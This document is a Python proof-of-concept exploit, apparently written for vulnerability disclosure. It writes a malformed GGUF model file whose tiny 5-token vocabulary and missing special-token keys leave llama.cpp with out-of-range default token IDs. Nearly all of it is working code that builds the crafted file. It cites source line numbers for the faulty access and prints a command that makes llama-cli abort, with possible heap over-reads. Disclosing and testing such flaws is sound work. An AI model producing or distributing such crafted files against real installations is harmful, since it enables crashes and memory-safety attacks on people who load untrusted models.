"""
PoC: Heap Buffer Over-read via Unvalidated Default Special Token IDs in GGUF

Vulnerability: In llama-vocab.cpp, when tokenizer.ggml.model = "bert", the
default special token IDs are set to bos=101, unk=100, sep=102, pad=0,
mask=103 (lines 1754-1763). These defaults are NOT validated against the
actual vocabulary size. If the GGUF has fewer than 104 tokens AND does not
include explicit tokenizer.ggml.bos_token_id (etc.) keys, the defaults
remain in effect.

Later, print_info() at line 3352 calls
    id_to_token.at(special_bos_id)   // special_bos_id = 101, vector size = 5
which throws std::out_of_range. The exception propagates up and causes model
loading to fail with "error loading model: vector" (the what() string of
std::out_of_range from vector::at). This demonstrates the unvalidated OOB
access.

Additionally, if the model somehow survived past print_info(), the special
token IDs would be used during tokenization (e.g., push_back(special_bos_id=101)
at line 3027), causing OOB embedding lookups -- a true heap buffer over-read.

For the "llama" tokenizer variant, special_eos_id=2 with a 1-token vocabulary
hits the even more dangerous id_to_token[tid] (operator[], no bounds check) at
line 2527 during the special_eog_ids loop -- true undefined behavior / heap
over-read.

This script creates a raw GGUF v3 binary file with:
- general.architecture = "llama" (so the llama model loader is used)
- tokenizer.ggml.model = "bert" (triggers the OOB default special token IDs)
- tokenizer.ggml.tokens = 5 tokens only (indices 0-4)
- NO tokenizer.ggml.bos_token_id or other special token ID keys
- all required llama architecture metadata
- minimal dummy tensors to pass model loading checks
"""
|
|
import struct
import os

import numpy as np


# GGUF file format constants
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
GGUF_DEFAULT_ALIGNMENT = 32

# GGUF metadata value types
GGUF_TYPE_UINT8 = 0
GGUF_TYPE_INT8 = 1
GGUF_TYPE_UINT16 = 2
GGUF_TYPE_INT16 = 3
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_INT32 = 5
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_BOOL = 7
GGUF_TYPE_STRING = 8
GGUF_TYPE_ARRAY = 9
GGUF_TYPE_UINT64 = 10
GGUF_TYPE_INT64 = 11
GGUF_TYPE_FLOAT64 = 12

# ggml tensor data types (only the two used by this PoC)
GGML_TYPE_F32 = 0
GGML_TYPE_F16 = 1

def write_string(f, s):
    """Write a GGUF string: uint64 length + UTF-8 chars (no null terminator)."""
    encoded = s.encode('utf-8')
    f.write(struct.pack('<Q', len(encoded)))
    f.write(encoded)
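

# Sanity check for the string encoding above; the helper below is this
# script's own illustration (not a llama.cpp/gguf-py API): "bert" must
# serialize as an 8-byte little-endian length prefix followed by the raw
# UTF-8 bytes.
def _selftest_write_string():
    import io
    buf = io.BytesIO()
    write_string(buf, "bert")
    assert buf.getvalue() == b"\x04\x00\x00\x00\x00\x00\x00\x00bert"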
|
|
def write_kv_string(f, key, value):
    """Write a KV pair with string value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    write_string(f, value)


def write_kv_uint32(f, key, value):
    """Write a KV pair with uint32 value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_UINT32))
    f.write(struct.pack('<I', value))


def write_kv_int32(f, key, value):
    """Write a KV pair with int32 value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_INT32))
    f.write(struct.pack('<i', value))


def write_kv_float32(f, key, value):
    """Write a KV pair with float32 value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
    f.write(struct.pack('<f', value))


def write_kv_bool(f, key, value):
    """Write a KV pair with bool value (stored as int8)."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_BOOL))
    f.write(struct.pack('<b', 1 if value else 0))


def write_kv_string_array(f, key, values):
    """Write a KV pair with string array value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    f.write(struct.pack('<Q', len(values)))
    for v in values:
        write_string(f, v)


def write_kv_float32_array(f, key, values):
    """Write a KV pair with float32 array value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
    f.write(struct.pack('<Q', len(values)))
    for v in values:
        f.write(struct.pack('<f', v))


def write_kv_int32_array(f, key, values):
    """Write a KV pair with int32 array value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
    f.write(struct.pack('<I', GGUF_TYPE_INT32))
    f.write(struct.pack('<Q', len(values)))
    for v in values:
        f.write(struct.pack('<i', v))
|
def write_tensor_info(f, name, shape, ggml_type, offset):
    """Write a tensor info entry.

    Format: name (string), n_dims (uint32), dims[] (int64 each),
    type (int32), offset (uint64).
    """
    write_string(f, name)
    n_dims = len(shape)
    f.write(struct.pack('<I', n_dims))
    for dim in shape:
        f.write(struct.pack('<q', dim))
    f.write(struct.pack('<i', ggml_type))
    f.write(struct.pack('<Q', offset))
|
def tensor_byte_size(shape, ggml_type):
    """Calculate raw byte size of a tensor."""
    n_elements = 1
    for d in shape:
        n_elements *= d
    if ggml_type == GGML_TYPE_F32:
        return n_elements * 4
    elif ggml_type == GGML_TYPE_F16:
        return n_elements * 2
    else:
        raise ValueError(f"Unsupported ggml_type: {ggml_type}")


def align_offset(offset, alignment=GGUF_DEFAULT_ALIGNMENT):
    """Align offset to the given alignment boundary."""
    return ((offset + alignment - 1) // alignment) * alignment
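

# Worked example for the two helpers above (illustrative assertions added by
# this sketch): the 5 x 32 f16 token-embedding tensor used below occupies
# 5 * 32 * 2 = 320 bytes, which is already a multiple of the 32-byte GGUF
# alignment; an unaligned size such as 130 rounds up to 160.
assert tensor_byte_size((5, 32), GGML_TYPE_F16) == 320
assert align_offset(320) == 320
assert align_offset(130) == 160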


def create_poc_gguf(output_path):
    """Create a minimal GGUF that triggers OOB access via default bert special token IDs."""

    # Tiny "llama" hyperparameters: just enough for the loader to accept the file
    n_vocab = 5
    n_embd = 32
    n_head = 4
    n_head_kv = 4
    n_layer = 1
    n_ff = 64
    ctx_len = 128

    # Only 5 tokens, so valid ids are 0-4; the default bert special ids
    # (100-103) all point past the end of this vocabulary.
    tokens = ["[PAD]", "[UNK]", "[CLS]", "[SEP]", "[MASK]"]
    token_scores = [0.0] * n_vocab
    token_types = [0] * n_vocab

    # Minimal tensor set for a one-layer llama-architecture model
    tensors = [
        ("token_embd.weight", (n_vocab, n_embd), GGML_TYPE_F16),
        ("output_norm.weight", (n_embd,), GGML_TYPE_F32),
        ("output.weight", (n_vocab, n_embd), GGML_TYPE_F16),
        ("blk.0.attn_norm.weight", (n_embd,), GGML_TYPE_F32),
        ("blk.0.attn_q.weight", (n_embd, n_embd), GGML_TYPE_F16),
        ("blk.0.attn_k.weight", (n_head_kv * (n_embd // n_head), n_embd), GGML_TYPE_F16),
        ("blk.0.attn_v.weight", (n_head_kv * (n_embd // n_head), n_embd), GGML_TYPE_F16),
        ("blk.0.attn_output.weight", (n_embd, n_embd), GGML_TYPE_F16),
        ("blk.0.ffn_norm.weight", (n_embd,), GGML_TYPE_F32),
        ("blk.0.ffn_gate.weight", (n_ff, n_embd), GGML_TYPE_F16),
        ("blk.0.ffn_up.weight", (n_ff, n_embd), GGML_TYPE_F16),
        ("blk.0.ffn_down.weight", (n_embd, n_ff), GGML_TYPE_F16),
    ]

    # 15 KV pairs are written below: 2 general.*, 9 llama.*, 4 tokenizer.ggml.*
    n_kv = 15
    n_tensors = len(tensors)
|
|
| print(f"[*] Creating PoC GGUF: {output_path}") |
| print(f"[*] Vocabulary size: {n_vocab} tokens (indices 0-{n_vocab-1})") |
| print(f"[*] Tokenizer model: bert") |
| print(f"[*] Default special token IDs (unvalidated):") |
| print(f"[*] bos_token_id = 101 (OOB! vector size = {n_vocab})") |
| print(f"[*] unk_token_id = 100 (OOB! vector size = {n_vocab})") |
| print(f"[*] sep_token_id = 102 (OOB! vector size = {n_vocab})") |
| print(f"[*] mask_token_id = 103 (OOB! vector size = {n_vocab})") |
| print(f"[*] pad_token_id = 0 (in bounds)") |
| print(f"[*] No explicit special token ID keys in GGUF -> defaults are used") |
| print(f"[*] Number of KV pairs: {n_kv}") |
| print(f"[*] Number of tensors: {n_tensors}") |
|
|
    with open(output_path, 'wb') as f:
        # GGUF header: magic, version, tensor count, KV count
        f.write(GGUF_MAGIC)
        f.write(struct.pack('<I', GGUF_VERSION))
        f.write(struct.pack('<Q', n_tensors))
        f.write(struct.pack('<Q', n_kv))

        # KV metadata
        write_kv_string(f, "general.architecture", "llama")
        write_kv_string(f, "general.name", "poc-bert-oob-special-tokens")

        # Required llama architecture metadata
        write_kv_uint32(f, "llama.context_length", ctx_len)
        write_kv_uint32(f, "llama.embedding_length", n_embd)
        write_kv_uint32(f, "llama.block_count", n_layer)
        write_kv_uint32(f, "llama.attention.head_count", n_head)
        write_kv_uint32(f, "llama.attention.head_count_kv", n_head_kv)
        write_kv_uint32(f, "llama.feed_forward_length", n_ff)
        write_kv_uint32(f, "llama.vocab_size", n_vocab)
        write_kv_float32(f, "llama.attention.layer_norm_rms_epsilon", 1e-5)
        write_kv_uint32(f, "llama.rope.dimension_count", n_embd // n_head)

        # The trigger: bert tokenizer model with a tiny vocabulary
        write_kv_string(f, "tokenizer.ggml.model", "bert")

        write_kv_string_array(f, "tokenizer.ggml.tokens", tokens)
        write_kv_float32_array(f, "tokenizer.ggml.scores", token_scores)
        write_kv_int32_array(f, "tokenizer.ggml.token_type", token_types)

        # Deliberately NOT written: tokenizer.ggml.bos_token_id /
        # unk_token_id / sep_token_id / pad_token_id / mask_token_id.
        # Without these keys, llama.cpp keeps the unvalidated bert
        # defaults (bos=101 etc.).

        # Tensor infos; offsets are relative to the start of the aligned
        # tensor data section and must themselves be alignment multiples
        tensor_data_entries = []
        current_offset = 0
        for tname, tshape, ttype in tensors:
            current_offset = align_offset(current_offset, GGUF_DEFAULT_ALIGNMENT)
            size = tensor_byte_size(tshape, ttype)
            tensor_data_entries.append((tname, tshape, ttype, current_offset, size))
            write_tensor_info(f, tname, tshape, ttype, current_offset)
            current_offset += size

        total_tensor_data_size = align_offset(current_offset, GGUF_DEFAULT_ALIGNMENT)

        # Pad so the tensor data section starts on an alignment boundary
        current_pos = f.tell()
        aligned_pos = align_offset(current_pos, GGUF_DEFAULT_ALIGNMENT)
        if aligned_pos > current_pos:
            f.write(b'\x00' * (aligned_pos - current_pos))

        data_start = f.tell()

        # Tensor data, each blob padded out to its declared offset
        for tname, tshape, ttype, toffset, tsize in tensor_data_entries:
            current_data_pos = f.tell() - data_start
            target_pos = toffset
            if target_pos > current_data_pos:
                f.write(b'\x00' * (target_pos - current_data_pos))

            # Dummy weights: all zeros, except norm weights are set to one
            if ttype == GGML_TYPE_F32:
                data = np.zeros(tshape, dtype=np.float32)
                if "norm" in tname:
                    data = np.ones(tshape, dtype=np.float32)
                f.write(data.tobytes())
            elif ttype == GGML_TYPE_F16:
                data = np.zeros(tshape, dtype=np.float16)
                f.write(data.tobytes())

        # Final padding to the alignment boundary
        current_pos = f.tell()
        aligned_pos = align_offset(current_pos, GGUF_DEFAULT_ALIGNMENT)
        if aligned_pos > current_pos:
            f.write(b'\x00' * (aligned_pos - current_pos))

    file_size = os.path.getsize(output_path)
    print(f"\n[+] Created: {output_path}")
    print(f"[+] Size: {file_size} bytes ({file_size/1024:.1f} KB)")
    print("\n[*] Crash path:")
    print("[*] 1. llama-vocab.cpp:1754-1763 sets bert defaults: bos=101, unk=100, sep=102, mask=103")
    print(f"[*] 2. llama-vocab.cpp:2130-2131 resizes id_to_token to {n_vocab} (from token list)")
    print("[*] 3. llama-vocab.cpp:2215-2228 only overrides if keys EXIST in GGUF (they don't)")
    print("[*] 4. llama-vocab.cpp:3352 does id_to_token.at(101) -> std::out_of_range -> abort()")
    print("\n[+] To reproduce:")
    print(f"[+] llama-cli -m {output_path} -p 'hello'")
    print("[+] Expected: crash via uncaught std::out_of_range exception (abort/SIGABRT)")
|
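
# Optional sanity check -- this helper is the PoC's own addition, not a
# llama.cpp or gguf-py API. It re-reads the fixed 24-byte GGUF header this
# script writes (4-byte magic, uint32 version, uint64 tensor count, uint64
# KV count) and confirms it round-trips. Call it manually after
# create_poc_gguf() if you want to verify the output file.
def _verify_gguf_header(path):
    with open(path, 'rb') as f:
        magic = f.read(4)
        version, = struct.unpack('<I', f.read(4))
        n_tensors, = struct.unpack('<Q', f.read(8))
        n_kv, = struct.unpack('<Q', f.read(8))
    assert magic == GGUF_MAGIC and version == GGUF_VERSION
    print(f"[+] Header OK: version={version}, n_tensors={n_tensors}, n_kv={n_kv}")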
|
if __name__ == "__main__":
    output_dir = "/Users/eltarne/Documents/script/gguf_poc"
    os.makedirs(output_dir, exist_ok=True)

    output_path = os.path.join(output_dir, "poc_special_token_oob.gguf")
    create_poc_gguf(output_path)
|
|